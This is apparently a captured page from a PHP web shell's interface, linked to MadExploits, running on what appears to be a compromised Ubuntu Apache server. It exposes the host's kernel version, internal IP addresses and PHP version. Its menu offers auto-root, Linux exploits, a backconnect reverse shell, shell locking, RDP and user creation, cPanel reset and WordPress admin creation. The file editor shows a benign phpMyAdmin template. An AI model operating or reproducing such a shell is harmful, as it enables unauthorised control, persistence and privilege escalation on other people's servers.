Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
templates /
menu /
[ HOME SHELL ]
Name
Size
Permission
Action
breadcrumbs.twig
1.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : breadcrumbs.twig
<div id="floating_menubar"></div> <nav id="server-breadcrumb" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> {{ show_icons('TabsMode') ? get_image('s_host') }} <a href="{{ url(server.url) }}" data-raw-text="{{ server.name }}"> {% if show_text('TabsMode') %}{% trans 'Server:' %}{% endif %} {{ server.name }} </a> </li> {% if database is not empty %} <li class="breadcrumb-item"> {{ show_icons('TabsMode') ? get_image('s_db') }} <a href="{{ url(database.url, {'db': database.name}) }}" data-raw-text="{{ database.name }}"> {% if show_text('TabsMode') %}{% trans 'Database:' %}{% endif %} {{ database.name }} </a> </li> {% if table is not empty %} <li class="breadcrumb-item"> {{ show_icons('TabsMode') ? get_image(table.is_view ? 'b_views' : 's_tbl') }} <a href="{{ url(table.url, {'db': database.name, 'table': table.name}) }}" data-raw-text="{{ table.name }}"> {% if show_text('TabsMode') %} {% if table.is_view %} {% trans 'View:' %} {% else %} {% trans 'Table:' %} {% endif %} {% endif %} {{ table.name }} </a> </li> {% if table.comment is not empty %} <span class="breadcrumb-comment">“{{ table.comment }}”</span> {% endif %} {% elseif database.comment is not empty %} <span class="breadcrumb-comment">“{{ database.comment }}”</span> {% endif %} {% endif %} </ol> </nav>
Close